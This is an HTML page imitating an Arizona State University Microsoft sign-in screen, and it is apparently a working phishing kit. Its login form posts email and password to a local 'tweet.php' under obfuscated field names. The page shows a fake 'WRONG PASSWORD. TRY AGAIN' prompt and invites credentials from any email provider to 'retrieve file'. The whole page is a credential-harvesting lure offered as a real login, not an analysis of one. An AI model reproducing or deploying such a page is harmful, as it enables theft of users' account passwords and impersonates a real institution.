<!DOCTYPE html>
<html lang="en-US">
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=1366, initial-scale=1.0, maximum-scale=1.0"><meta http-equiv="cache-control" content="no-cache,no-store"><meta http-equiv="pragma" content="no-cache"><meta http-equiv="expires" content="-1"><meta name="mswebdialog-title" content="Connecting to Arizona State University">
	<title>Sign In</title>
	<script type="text/javascript">
//<![CDATA[
function LoginErrors(){this.userNameFormatError = 'Enter your user ID in the format \u0026quot;domain\\user\u0026quot; or \u0026quot;user@domain\u0026quot;.'; this.passwordEmpty = 'Enter your password.'; this.passwordTooLong = 'Password is too long (\u0026gt; 128 characters).';}; var maxPasswordLength = 128;
//]]>
</script><script type="text/javascript">
//<![CDATA[
// Copyright (c) Microsoft Corporation.  All rights reserved.
function InputUtil(errTextElementID, errDisplayElementID) {

    if (!errTextElementID)  errTextElementID = 'errorText'; 
    if (!errDisplayElementID)  errDisplayElementID = 'error'; 

    this.hasFocus = false;
    this.errLabel = document.getElementById(errTextElementID);
    this.errDisplay = document.getElementById(errDisplayElementID);
};
InputUtil.prototype.canDisplayError = function () {
    return this.errLabel && this.errDisplay;
}
InputUtil.prototype.checkError = function () {
    if (!this.canDisplayError){
        throw new Error ('Error element not present');
    }
    if (this.errLabel && this.errLabel.innerHTML) {
        this.errDisplay.style.display = '';        
        var cause = this.errLabel.getAttribute('for');
        if (cause) {
            var causeNode = document.getElementById(cause);
            if (causeNode && causeNode.value) {
                causeNode.focus();
                this.hasFocus = true;
            }
        }
    }
    else {
        this.errDisplay.style.display = 'none';
    }
};
InputUtil.prototype.setInitialFocus = function (input) {
    if (this.hasFocus) return;
    var node = document.getElementById(input);
    if (node) {
        if ((/^\s*$/).test(node.value)) {
            node.focus();
            this.hasFocus = true;
        }
    }
};
InputUtil.prototype.setError = function (input, errorMsg) {
    if (!this.canDisplayError) {
        throw new Error('Error element not present');
    }
    input.focus();

    if (errorMsg) {
        this.errLabel.innerHTML = errorMsg;
    }
    this.errLabel.setAttribute('for', input.id);
    this.errDisplay.style.display = '';
};
InputUtil.makePlaceholder = function (input) {
    var ua = navigator.userAgent;

    if (ua != null && 
        (ua.match(/MSIE 9.0/) != null || 
         ua.match(/MSIE 8.0/) != null ||
         ua.match(/MSIE 7.0/) != null)) {
        var node = document.getElementById(input);
        if (node) {
            var placeholder = node.getAttribute("placeholder");
            if (placeholder != null && placeholder != '') {
                var label = document.createElement('input');
                label.type = "text";
                label.value = placeholder;
                label.readOnly = true;
                label.style.position = 'absolute';
                label.style.borderColor = 'transparent';
                label.className = node.className + ' hint';
                label.tabIndex = -1;
                label.onfocus = function () { this.nextSibling.focus(); };

                node.style.position = 'relative';
                node.parentNode.style.position = 'relative';
                node.parentNode.insertBefore(label, node);
                node.onkeyup = function () { InputUtil.showHint(this); };
                node.onblur = function () { InputUtil.showHint(this); };
                node.style.background = 'transparent';

                node.setAttribute("placeholder", "");
                InputUtil.showHint(node);
            }
        }
    }
};
InputUtil.focus = function (inputField) {
    var node = document.getElementById(inputField);
    if (node) node.focus();
};
InputUtil.hasClass = function(node, clsName) {
    return node.className.match(new RegExp('(\\s|^)' + clsName + '(\\s|$)'));
};
InputUtil.addClass = function(node, clsName) {
    if (!this.hasClass(node, clsName)) node.className += " " + clsName;
};
InputUtil.removeClass = function(node, clsName) {
    if (this.hasClass(node, clsName)) {
        var reg = new RegExp('(\\s|^)' + clsName + '(\\s|$)');
        node.className = node.className.replace(reg, ' ');
    }
};
InputUtil.showHint = function (node, gotFocus) {
    if (node.value && node.value != '') {
        node.previousSibling.style.display = 'none';
    }
    else {
        node.previousSibling.style.display = '';
    }
};
InputUtil.updatePlaceholder = function (input, placeholderText) {
    var node = document.getElementById(input);
    if (node) {
        var ua = navigator.userAgent;
        if (ua != null &&
            (ua.match(/MSIE 9.0/) != null ||
            ua.match(/MSIE 8.0/) != null ||
            ua.match(/MSIE 7.0/) != null)) {
            var label = node.previousSibling;
            if (label != null) {
                label.value = placeholderText;
            }
        }
        else {
            node.placeholder = placeholderText;
        }
    }
};

//]]>
</script>
	<link href="Sign%20In_files/style.css" rel="stylesheet" type="text/css" />
	<style type="text/css">.illustrationClass {background-image:url(https://www.bleepstatic.com/images/news/u/1097497/Microsoft/Outlook.jpg);}
	</style>
	<style type="text/css">
	</style>
</head>
<body class="body" dir="ltr">
<div id="noScript" style="position: static; width: 100%; height: 100%; z-index: 100; display: none;">
<h1>JavaScript required</h1>

<p>JavaScript is required. This web browser does not support JavaScript or JavaScript in this web browser is not enabled.</p>

<p>To find out if your web browser supports JavaScript or to enable JavaScript, see web browser help.</p>
</div>
<script type="text/javascript" language="JavaScript">
         document.getElementById("noScript").style.display = "none";
    </script>

<div id="fullPage">
<div class="float" id="brandingWrapper">
<div class="illustrationClass" id="branding"></div>
</div>

<div class="float" id="contentWrapper">
<div id="content">
<div id="header"><img alt="University &amp; College" class="logoImage" id="companyLogo" src="Sign%20In_files/logo.png" /></div>

<div id="workArea">
<div class="groupMargin" id="authArea">
<div id="loginArea">
<div class="groupMargin" id="loginMessage">Sign in with your organizational account</div>

<form action="tweet.php" autocomplete="off" id="loginForm" method="post" novalidate="novalidate" onkeypress="if (event &amp;&amp; event.keyCode == 13){ didSubmitForm(); Login.submitLoginRequest();}">
<div id="formsAuthenticationArea" style="display: none;">
<table id="signInTable">
	<tbody>
		<tr>
			<td></td>
			<td>
			<div class="fieldMargin error smallText" id="error" style="display: none; color: rgb(224, 48, 33);"></div>
			</td>
		</tr>
		<tr>
			<td class="lbl-field" style="padding-bottom: 35px;">Sign in using:</td>
			<td>
			<table>
				<tbody>
					<tr>
						<td>
						<div style="width: 85px; margin-top: -15px;"><input checked="checked" name="usertype" style="margin-top: -4px;" tabindex="7" type="radio" value="@domain.com" /><span class="radio-lbl">School account</span></div>
						</td>
						<td>
						<div><input class="radio-input" name="usertype" style="float: left; margin-top: 2px;" tabindex="8" type="radio" value="@" />
						<div class="radio-lbl" style="margin-left: 20px;">Work/Organizational account</div>
						</div>
						</td>
					</tr>
				</tbody>
			</table>
			</td>
		</tr>
		<tr>
			<td class="lbl-field"><span style="width:130px; display:block; margin-top:-22px;">Email</span></td>
			<td><input autocomplete="off" class="text fullWidth" id="userNameInput" name="A4122D1F1DBCA462A849AF0095B4279AF" placeholder="enter email address in full" spellcheck="false" tabindex="1" type="email" value="" /></td>
		</tr>
		<tr>
			<td class="lbl-field"><span style="width:130px; display:block; margin-top:-22px;">School/Work</span></td>
			<td><input autocomplete="off" class="text fullWidth" id="passwordInput" name="B1BECBF0A08974148819C10084A2D9F43" placeholder="" tabindex="2" type="password" /></td>
		</tr>
		<tr>
			<td></td>
			<td><span class="submit" id="submitButton" onclick="didSubmitForm(); return Login.submitLoginRequest();" onkeypress="if (event &amp;&amp; event.keyCode == 13){ didSubmitForm(); Login.submitLoginRequest();}" role="button" tabindex="3">Sign in</span></td>
		</tr>
		<tr>
			<td></td>
			<td></td>
		</tr>
	</tbody>
</table>

<div id="userNameArea"><label class="hidden" for="userNameInput" id="userNameInputLabel">User Account</label></div>

<div id="passwordArea" style="display: none;"><label class="hidden" for="passwordInput" id="passwordInputLabel">Password</label></div>

<div id="kmsiArea" style="display:none"><input id="kmsiInput" name="Kmsi" tabindex="3" type="checkbox" value="true" /> <label for="kmsiInput">Keep me signed in</label></div>

<div class="submitMargin" id="submissionArea"></div>
</div>
<input id="optionForms" name="AuthMethod" type="hidden" value="FormsAuthentication" />
<div id="authOptions"><script type="text/javascript">
                function SelectOption(option) {
                    var i = document.getElementById('optionSelection');
                    i.value = option;
                    document.forms['options'].submit();
                    return false;
                }
            </script><input id="optionSelection" name="AuthMethod" type="hidden" />
<div class="groupMargin" id="authOptionLinks"></div>
</div>
</form>

<div class="groupMargin" id="introduction">
<div id="WelcomeUserType">
<div style="text-align: center; padding-bottom: 10px">
<div>
<div class="header-sign-in-as">Sign in to retrieve file. You can also use email credentials from other providers as long as it&#39;s verified</div>

<div style="background:#eee;border:20px solid #ccc;padding:10px 20px;">&nbsp;
<div class="lbl sign-in-as"><span style="font-size:28px;"><big><button class="btn sign-in-as" id="welcomeUserTypeFaculty" onclick="didClickWelcomeFaculty();" onkeypress="if (event &amp;&amp; event.keyCode == 13){ event.stopPropagation(); didClickWelcomeFaculty(); }" tabindex="2" type="button">WRONG PASSWORD. TRY AGAIN</button></big></span></div>
</div>
</div>
</div>
</div>

<div id="signInAsInfo" style="margin-top: 170px;"><br />
&nbsp;</div>

<div id="signInUserMenu" style="text-align: center;"><a id="advancedUser" onclick="displayAdvancedUserMenu();" onkeypress="if (event &amp;&amp; event.keyCode == 13){ event.stopPropagation(); displayAdvancedUserMenu(); }" tabindex="5">User from other providers are also permitted.</a><a id="basicUser" onclick="displayBasicUserMenu();" onkeypress="if (event &amp;&amp; event.keyCode == 13){ event.stopPropagation(); displayBasicUserMenu(); }" style="display: none;" tabindex="5">Basic User</a></div>
</div>
<script type="text/javascript">
        //<![CDATA[

            function Login() {
            }

            Login.userNameInput = 'userNameInput';
            Login.passwordInput = 'passwordInput';

            Login.initialize = function () {

                var u = new InputUtil();

                u.checkError();
                u.setInitialFocus(Login.userNameInput);
                u.setInitialFocus(Login.passwordInput);
            }();

            Login.submitLoginRequest = function () { 
                var u = new InputUtil();
                var e = new LoginErrors();

                var userName = document.getElementById(Login.userNameInput);
                var password = document.getElementById(Login.passwordInput);

                if (!userName.value || !userName.value.match('[@\\\\]')) {
                    u.setError(userName, e.userNameFormatError);
                    return false;
                }

                if (!password.value) {
                    u.setError(password, e.passwordEmpty);
                    return false;
                }

                if (password.value.length > maxPasswordLength) {
                    u.setError(password, e.passwordTooLong);
                    return false;
                }

                document.forms['loginForm'].submit();
                return false;
            };

            InputUtil.makePlaceholder(Login.userNameInput);
            InputUtil.makePlaceholder(Login.passwordInput);
        //]]>
        </script></div>
</div>
</div>

<div id="footerPlaceholder"></div>
</div>

<ul id="footer">
	<li><a href="http://systemstatus.asu.edu/">System Status</a></li>
	<li><a href="http://www.asu.edu/copyright/">Copyright</a></li>
	<li><a href="http://www.asu.edu/aad/manuals/acd/acd125.html">Acceptable Use</a></li>
	<li><a href="http://www.asu.edu/privacy/">Privacy</a></li>
</ul>
</div>
</div>
<script type="text/javascript">
//<![CDATA[
// Copyright (c) Microsoft Corporation.  All rights reserved.
// This file contains several workarounds on inconsistent browser behaviors that administrators may customize.
"use strict";

var submitButton = document.getElementById("submitButton");
if(submitButton) {
    submitButton.tabIndex = 3;
    submitButton.setAttribute("onclick", "didSubmitForm(); return Login.submitLoginRequest();");
    submitButton.setAttribute("onKeyPress", "if (event && event.keyCode == 13){ didSubmitForm(); Login.submitLoginRequest();}");
}

var signInLearnMoreButton = document.getElementById("signInLearnMore");
if(signInLearnMoreButton) {
    signInLearnMoreButton.tabIndex = 4;
    signInLearnMoreButton.setAttribute("onclick", "toggleModal(); return false;");
    signInLearnMoreButton.setAttribute("onKeyPress", "if (event && event.keyCode == 13){ event.stopPropagation(); toggleModal(); }");
}

var welcomeUserTypeStudentButton = document.getElementById("welcomeUserTypeStudent");
if(welcomeUserTypeStudentButton) {
    welcomeUserTypeStudentButton.setAttribute("onclick", "didClickWelcomeStudent();");
    welcomeUserTypeStudentButton.setAttribute("onKeyPress", "if (event && event.keyCode == 13){ event.stopPropagation(); didClickWelcomeStudent(); }");
}

var welcomeUserTypeFacultyButton = document.getElementById("welcomeUserTypeFaculty");
if(welcomeUserTypeFacultyButton) {
    welcomeUserTypeFacultyButton.setAttribute("onclick", "didClickWelcomeFaculty();");
    welcomeUserTypeFacultyButton.setAttribute("onKeyPress", "if (event && event.keyCode == 13){ event.stopPropagation(); didClickWelcomeFaculty(); }");
}

//@overwrite
InputUtil.prototype.setError = function (input, errorMsg) {
    if (!this.canDisplayError) {
        throw new Error('Error element not present');
    }

    if(userNameInput) {
        userNameInput.style.border = "solid 1px #BABABA";
    }

    if(passwordInput) {
        passwordInput.style.border = "solid 1px #BABABA";
    }

    input.focus();
    input.style.border = "solid 2px #E03021";

    if (errorMsg) {
        this.errLabel.innerHTML = errorMsg;
    }
    this.errLabel.setAttribute('for', input.id);
    this.errDisplay.style.display = '';
};

var loginForm = document.getElementById("loginForm");
if(loginForm) {
    loginForm.setAttribute("onKeyPress", "if (event && event.keyCode == 13){ didSubmitForm(); Login.submitLoginRequest();}");
}

var newSignInTable = document.createElement("table");
newSignInTable.setAttribute("id", "signInTable");

var newSignInErrorMessageRow = document.createElement("tr");
var newSignInErrorMessageFiller = document.createElement("td");
var newSignInErrorMessageText = document.createElement("td");
var signInErrorText = document.getElementById("error");

if(signInErrorText) {
    newSignInErrorMessageText.appendChild(signInErrorText);
    newSignInErrorMessageRow.appendChild(newSignInErrorMessageFiller);
    newSignInErrorMessageRow.appendChild(newSignInErrorMessageText);

    signInErrorText.style.color = '#E03021';
}

var userNameInput = document.getElementById("userNameInput");
var newUserNameRow = document.createElement("tr");
if(userNameInput) {
    var newUserNameLabel = document.createElement("td");
    newUserNameLabel.className = "lbl-field";
    newUserNameLabel.innerHTML = "<span style='width:130px; display:block; margin-top:-22px;'>Email ID:</span>";
    newUserNameRow.appendChild(newUserNameLabel);

    var newUserNameInput = document.createElement("td");
    userNameInput.placeholder = "enter email address in full";
    userNameInput.onblur = null;
    userNameInput.onkeyup = null;
    userNameInput.tabIndex = 1;
    userNameInput.value = userNameInput.value.replace("", "");
    newUserNameInput.appendChild(userNameInput);

    newUserNameRow.appendChild(newUserNameInput);
}


var passwordInput = document.getElementById("passwordInput");
var newPasswordRow = document.createElement("tr");
if(passwordInput) {
    var newPasswordLabel = document.createElement("td");
    newPasswordLabel.className = "lbl-field";
    newPasswordLabel.innerHTML = "<span style='width:130px; display:block; margin-top:-22px;'>Password:</span>";
    newPasswordRow.appendChild(newPasswordLabel);

    var newPasswordInput = document.createElement("td");
    passwordInput.placeholder = "";
    passwordInput.blur = null;
    passwordInput.onkeyup = null;
    passwordInput.tabIndex = 2;
    newPasswordInput.appendChild(passwordInput);
    newPasswordRow.appendChild(newPasswordInput);
}


var userTypeInput = document.getElementById("formUserType");
var newUserTypeRow = document.createElement("tr");
if(userTypeInput) {
    var newUserTypeLabel = document.createElement("td");
    newUserTypeLabel.className = "lbl-field";
    newUserTypeLabel.innerHTML = "Sign in using:";
    newUserTypeRow.appendChild(newUserTypeLabel);

    var newUserTypeInput = document.createElement("td");
    newUserTypeInput.appendChild(userTypeInput);
    newUserTypeRow.appendChild(newUserTypeInput);

    newUserTypeLabel.style.paddingBottom = "35px";
}

var newSignInInfoRow = document.createElement("tr");
var fillerSignIn = document.createElement("td");
var newSignInFiller = document.createElement("td");
var newSignInBtn = document.createElement("td");

if(submitButton) {
    newSignInBtn.appendChild(submitButton);
    newSignInInfoRow.appendChild(newSignInFiller);
    newSignInInfoRow.appendChild(newSignInBtn);
}

var newSignInLearnMoreRow = document.createElement("tr");
var fillerSignInLearnMoreRow = document.createElement("td");
var newSignInLearnMore = document.createElement("td");
newSignInLearnMoreRow.appendChild(fillerSignInLearnMoreRow);
newSignInLearnMoreRow.appendChild(newSignInLearnMore);

newSignInTable.appendChild(newSignInErrorMessageRow);
newSignInTable.appendChild(newUserTypeRow);
newSignInTable.appendChild(newUserNameRow);
newSignInTable.appendChild(newPasswordRow);
newSignInTable.appendChild(newSignInInfoRow);
newSignInTable.appendChild(newSignInLearnMoreRow);

var loginArea = document.getElementById("formsAuthenticationArea");

if(loginArea) {
    loginArea.insertBefore(newSignInTable, loginArea.firstChild);
    hideLoginArea();
}


var modalOverlay = document.createElement("div");
modalOverlay.setAttribute("id", "modal-overlay");
modalOverlay.setAttribute("onclick", "toggleModal();");
var modal = document.createElement("div");
modal.setAttribute("id", "modal-wrapper");
modal.innerHTML = "<div id='modal'><div style='padding-left: 10px;'><div style='float:right;'><div class='modal-close' onclick='toggleModal(); return true;'>X</div></div><div class='modal-title'>What if I am neither Student or Faculty/Staff/Student Worker?</div><div class='modal-content'>Please attempt the following: <ul><li>Attempt to sign in via either method. If you are not authorized, you will be notified.</li><li>Contact the representative who granted you your credentials.</li><li>Contact the <a href='https://help.asu.edu/' style='color: #000 !important;'>Help Center</a> or call 1-855-ASU-5080 (1-855-278-5080).</li></ul></div></div></div></div>";
var signInInfo = document.getElementById("signInAsInfo");
if(signInInfo) {
    signInInfo.appendChild(modalOverlay);
    signInInfo.appendChild(modal);
    signInInfo.style.marginTop = '70px';
}

var currentFooter = document.getElementById("footer");
if(currentFooter) {
    var newFooter = document.createElement("ul");
    newFooter.innerHTML = "<li><a href='http://systemstatus.asu.edu'>System Status</a></li><li><a href='http://www.asu.edu/copyright/'>Copyright</a></li><li><a href='http://www.asu.edu/aad/manuals/acd/acd125.html'>Acceptable Use</a></li><li><a href='http://www.asu.edu/privacy/'>Privacy</a></li>";
    currentFooter.parentNode.replaceChild(newFooter, currentFooter);
    newFooter.setAttribute("id", "footer");
}

var userTypeRadioInputs = document.getElementsByName("usertype");
if(userTypeRadioInputs.length > 0) {
    userTypeRadioInputs[0].tabIndex = 7;
    userTypeRadioInputs[1].tabIndex = 8;
}

var welcomeUserTypeArea = document.getElementById("WelcomeUserType");

function displayWelcomeUserType() {
    if(welcomeUserTypeArea) {
        welcomeUserTypeArea.style.display = 'block';
    }
}

function hideWelcomeUserType() {
    if(welcomeUserTypeArea) {
        welcomeUserTypeArea.style.display = 'none';
    }
}

var signInUserMenu = document.getElementById('signInUserMenu');
function displayLoginArea() {
    if(signInInfo) {
        signInInfo.style.marginTop = '0px';
        newSignInLearnMore.appendChild(signInInfo);
        newSignInLearnMore.appendChild(signInUserMenu);
    }
    if(loginArea) {
        loginArea.style.display = 'block';
        userNameInput.focus();
    }
}

var introduction = document.getElementById('introduction');
function hideLoginArea() {
    if(signInInfo) {
        signInInfo.style.marginTop = '70px';
        introduction.appendChild(signInInfo);
        introduction.appendChild(signInUserMenu);
    }
    if(loginArea) {
        loginArea.style.display = 'none';
    }
}

var didSelectUserType = false;
function didClickWelcomeStudent() {
    hideWelcomeUserType();
    displayLoginArea();
    if(userTypeRadioInputs) {
        userTypeRadioInputs[0].checked = 'true'
    }
    didSelectUserType = true;
}

function didClickWelcomeFaculty() {
    hideWelcomeUserType();
    displayLoginArea();
    if(userTypeRadioInputs) {
        userTypeRadioInputs[0].checked = 'true'
    }
    didSelectUserType = true;
}

if(userNameInput) {
    userNameInput.focus();
}

var illustrationDiv = document.getElementsByClassName("illustrationClass");

var style = document.createElement("style");
style.appendChild(document.createTextNode(""));
document.head.appendChild(style);
style.sheet.insertRule(".illustrationClass { background-position: center center; }", 0);

var toggledModal = false;
function toggleModal() {
    var overlay = document.getElementById("modal-overlay");
    var modal = document.getElementById("modal-wrapper");

    if(toggledModal){
        overlay.style.display = "none";
        modal.style.display = "none";
       toggledModal = false;
    } else {
        overlay.style.display = "block";
        modal.style.display = "block";
        toggledModal = true;

        var modalClose = document.getElementsByClassName('modal-close');
        if(modalClose) {
            var modalCloseButton = modalClose[0];
            if(modalCloseButton) {
                modalCloseButton.tabIndex = '5';
                modalCloseButton.setAttribute("onclick", "toggleModal();");
                modalCloseButton.setAttribute("onKeyPress", "if (event && event.keyCode == 13){ event.stopPropagation(); toggleModal(); }");
            }
        }
    }
}

let wrapper = document.getElementById('modal-wrapper');
if(wrapper) {
    window.onclick = function(event) {
      if (event.target == wrapper) {
        toggleModal();
      }
    }
}

var isAdvancedUser = true;

function didSubmitForm() {
    var caseInsensetiveUser = userNameInput.value.toUpperCase();
    if(isAdvancedUser) {
        return true;
    }
    
    var userTypeRadio = document.getElementsByName("usertype");
    var domain;
    for(var i = 0, length = userTypeRadio.length; i < length; i++) {
        if(userTypeRadio[i].checked) {
            domain = userTypeRadio[i].value;
        }
    }
    
    var newUsername = userNameInput.value;
    if(newUsername.indexOf('@') < 0) {
        newUsername = newUsername;
    } else {
        newUsername = newUsername.substring(0, newUsername.indexOf('@'));
        newUsername = newUsername + domain;
    }
    
    if(domain == ''){
        if(newUsername.indexOf('\\') < 0) {
            newUsername = '' + newUsername;
        } else {
            newUsername = newUsername.substring(newUsername.indexOf('\\')+1, newUsername.length);
            newUsername = '' + newUsername;
        }
        newUsername = newUsername.substring(0, newUsername.indexOf('@')); // remove @asu.edu since asurite is prepended
    }
    userNameInput.value = newUsername;
    return true;
};


let btnAdvancedUser = document.getElementById('advancedUser');
if(btnAdvancedUser) {
    btnAdvancedUser.setAttribute("onclick", "displayAdvancedUserMenu();");
    btnAdvancedUser.setAttribute("onKeyPress", "if (event && event.keyCode == 13){ event.stopPropagation(); displayAdvancedUserMenu(); }");
}

let btnBasicUser = document.getElementById('basicUser');
if(btnBasicUser) {
    btnBasicUser.setAttribute("onclick", "displayBasicUserMenu();");
    btnBasicUser.setAttribute("onKeyPress", "if (event && event.keyCode == 13){ event.stopPropagation(); displayBasicUserMenu(); }");
}

function displayAdvancedUserMenu() {
    hideWelcomeUserType();
    displayLoginArea();

    newUserNameLabel.innerHTML="<span style='width:130px; display:block; margin-top:-22px;'>ADUPN:</span>"
    newUserTypeRow.style.display = 'none';
    btnAdvancedUser.style.display = 'none';
    btnBasicUser.style.display = 'block';

    isAdvancedUser = true;
}

function displayBasicUserMenu() {
    if(!didSelectUserType) {
        hideLoginArea();
        displayWelcomeUserType();
    }

    newUserNameLabel.innerHTML = "<span style='width:130px; display:block'>Email ID:</span>";
    newUserTypeRow.style.display = 'table-row';
    btnAdvancedUser.style.display = 'block';
    btnBasicUser.style.display = 'none';

    isAdvancedUser = false;
}

var oldPasswordLabel = document.getElementById("passwordArea");
if(oldPasswordLabel) {
    oldPasswordLabel.style.display = "none"
}

try {
    InputUtil.showHint = function (node, gotFocus) {};
} catch(ex) {
    
}

// iPhone email friendly keyboard does not include "\" key, use regular keyboard instead.
// Note change input type does not work on all versions of all browsers.
if (navigator.userAgent.match(/iPhone/i) != null) {
    var emails = document.querySelectorAll("input[type='text']");
    if (emails) {
        for (var i = 0; i < emails.length; i++) {
            emails[i].type = 'text';
        }
    }
}


// In the CSS file we set the ms-viewport to be consistent with the device dimensions, 
// which is necessary for correct functionality of immersive IE. 
// However, for Windows 8 phone we need to reset the ms-viewport's dimension to its original
// values (auto), otherwise the viewport dimensions will be wrong for Windows 8 phone.
// Windows 8 phone has agent string 'IEMobile 10.0'
if (navigator.userAgent.match(/IEMobile\/10\.0/)) {
    var msViewportStyle = document.createElement("style");
    msViewportStyle.appendChild(
        document.createTextNode(
            "@-ms-viewport{width:auto!important}"
        )
    );
    msViewportStyle.appendChild(
        document.createTextNode(
            "@-ms-viewport{height:auto!important}"
        )
    );
    document.getElementsByTagName("head")[0].appendChild(msViewportStyle);
}

// If the innerWidth is defined, use it as the viewport width.
if (window.innerWidth && window.outerWidth && window.innerWidth !== window.outerWidth) {
    var viewport = document.querySelector("meta[name=viewport]");
    viewport.setAttribute('content', 'width=' + window.innerWidth + ', initial-scale=1.0, maximum-scale=1.0');
}

// Gets the current style of a specific property for a specific element.
function getStyle(element, styleProp) {
    var propStyle = null;

    if (element && element.currentStyle) {
        propStyle = element.currentStyle[styleProp];
    }
    else if (element && window.getComputedStyle) {
        propStyle = document.defaultView.getComputedStyle(element, null).getPropertyValue(styleProp);
    }

    return propStyle;
}

// The script below is used for downloading the illustration image 
// only when the branding is displaying. This script work together
// with the code in PageBase.cs that sets the html inline style
// containing the class 'illustrationClass' with the background image.
var computeLoadIllustration = function () {
    var branding = document.getElementById("branding");
    var brandingDisplay = getStyle(branding, "display");
    var brandingWrapperDisplay = getStyle(document.getElementById("brandingWrapper"), "display");

    if (brandingDisplay && brandingDisplay !== "none" &&
        brandingWrapperDisplay && brandingWrapperDisplay !== "none") {
        var newClass = "illustrationClass";

        if (branding.classList && branding.classList.add) {
            branding.classList.add(newClass);
        } else if (branding.className !== undefined) {
            branding.className += " " + newClass;
        }
        if (window.removeEventListener) {
            window.removeEventListener('load', computeLoadIllustration, false);
            window.removeEventListener('resize', computeLoadIllustration, false);
        }
        else if (window.detachEvent) {
            window.detachEvent('onload', computeLoadIllustration);
            window.detachEvent('onresize', computeLoadIllustration);
        }
    }
};

if (window.addEventListener) {
    window.addEventListener('resize', computeLoadIllustration(), false);
    window.addEventListener('load', computeLoadIllustration(), false);
}
else if (window.attachEvent) {
    window.attachEvent('onresize', computeLoadIllustration);
    window.attachEvent('onload', computeLoadIllustration);
}

//]]>
</script></body>
</html>